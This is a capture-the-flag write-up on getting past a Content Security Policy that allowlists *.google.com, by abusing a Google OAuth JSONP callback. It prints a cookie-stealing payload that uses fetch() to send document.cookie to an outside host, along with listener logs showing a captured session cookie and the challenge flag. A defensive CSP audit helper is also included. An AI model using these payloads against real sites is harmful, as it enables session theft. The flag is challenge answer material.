I hadn't had much of an idea what CSP actually is until trying this
challenge.  How hard could it possibly be to steal someone's cookie?
As it turns out, plenty annoying.  Here are some useful resources I've
found on the topic:

- https://www.slideshare.net/LukasWeichselbaum/breaking-bad-csp
 <- Explains how to attack bad CSP configurations
- https://csp-evaluator.withgoogle.com/ <- Review CSP configuration
- https://github.com/zigoo0/JSONBee <- Find useful JSONP endpoints

The configuration forbids almost everything except for scripts
originating from `*.google.com` and requests performed via XHR/fetch
APIs.  Performing an XHR request cannot be done from an inline script
or a script hosted on your own servers, so I started looking into
whether there's anything hosted at `*.google.com` that might do the
trick.
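The policy just described, as an added example that is not part of the original writeup: a small audit helper that flags the two properties making a JSONP-based bypass possible, a third-party host allowlist in `script-src` and an open `connect-src`, with a hardened policy beside the weak one.  The policy strings, the nonce value and the JSONP origin list are constructed for the example, not taken from the challenge.

```python
import re
from typing import Dict, List
# Origins known to serve callback-reflecting (JSONP) scripts.  Constructed for
# this example; a real audit would use a maintained list such as JSONBee.
JSONP_ORIGINS = ("accounts.google.com", "www.google.com")

def parse_csp(header: str) -> Dict[str, List[str]]:
    """Split a Content-Security-Policy header into {directive: [sources]}."""
    policy: Dict[str, List[str]] = {}
    for directive in header.split(";"):
        tokens = directive.split()
        if tokens:
            policy[tokens[0].lower()] = tokens[1:]
    return policy

def host_matches(pattern: str, host: str) -> bool:
    """Simplified CSP host-source match: '*.google.com' covers subdomains.
    Scheme and path are stripped; ports are not handled."""
    pattern = re.sub(r"^https?://", "", pattern).split("/")[0].lower()
    if pattern == "*":
        return True
    if pattern.startswith("*."):
        return host.endswith(pattern[1:])
    return host == pattern

def audit_csp(header: str) -> List[str]:
    """Report why a JSONP script plus fetch() exfiltration would get through."""
    policy = parse_csp(header)
    findings: List[str] = []
    scripts = policy.get("script-src") or policy.get("default-src", [])
    # With 'strict-dynamic' the browser ignores the host allowlist entirely.
    if "'strict-dynamic'" not in scripts:
        for src in scripts:
            if src.startswith("'"):
                continue  # keyword, nonce or hash, not a host
            for origin in JSONP_ORIGINS:
                if host_matches(src, origin):
                    findings.append(f"script-src {src} allows JSONP from {origin}")
                    break
    connect = policy.get("connect-src") or policy.get("default-src", [])
    for src in connect:
        if not src.startswith("'"):  # any host (or *) is an exfil channel
            findings.append(f"connect-src {src} lets fetch() send data off-site")
    return findings

# Constructed policies: WEAK_CSP matches the challenge as described above;
# HARDENED_CSP uses a per-response nonce (placeholder value here) instead.
WEAK_CSP = "default-src 'none'; script-src *.google.com; connect-src *"
HARDENED_CSP = "default-src 'none'; script-src 'nonce-r4nd0m' 'strict-dynamic'; connect-src 'self'"
```

Run `audit_csp(WEAK_CSP)` to see both findings; the hardened policy returns none because nonce-gated scripts and a `'self'`-only `connect-src` close both the loader and the exfiltration channel.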

The JSONBee repository contains two endpoints for that purpose that
accept a callback argument, letting you pass in something that looks
like a JS function call.  I spent way too much time on the CSE one as
it performs drastic filtering; no amount of encoding made slashes or
colons work.  The OAuth one displayed scary-looking warnings about
permitted identifiers, but allowed me to execute my standard
cookie-stealer code:

   new Image().src='http://x32.be:10000/?c='+document.cookie;

Are we done yet?  Not so fast: assigning an arbitrary image source is
blocked by the CSP policy.  I rewrote the payload to use a `fetch`
request instead:

   <script src="https://accounts.google.com/o/oauth2/revoke?callback=fetch(new%20Request('http://x32.be:10000/c='.concat(document.cookie)))"></script>

A `python -m http.server --bind 0.0.0.0 10000` server successfully
picked up my request, but nothing from the admin.  After pinging the
challenge support staff, they restarted the bot simulating the admin,
giving me the following requests:

   91.121.107.198 - - [14/Sep/2019 19:45:34] code 404, message File not found
   91.121.107.198 - - [14/Sep/2019 19:45:34] "GET /c=PHPSESSID=ffffffffffffffffffffffffffffffffffff HTTP/1.1" 404 -
   216.165.2.60 - - [14/Sep/2019 19:45:43] code 404, message File not found
   216.165.2.60 - - [14/Sep/2019 19:45:43] "GET /c=session=eyJ1dWlkIjp7IiBiIjoiWW05MGRYTmxjZz09In19.XX0nQQ.LRH1nvri8331RPozt7xMHyOvOc8;%20flag=flag%7Bcsp_will_solve_EVERYTHING%7D HTTP/1.1" 404 -

The flag is in the cookie:

   flag{csp_will_solve_EVERYTHING}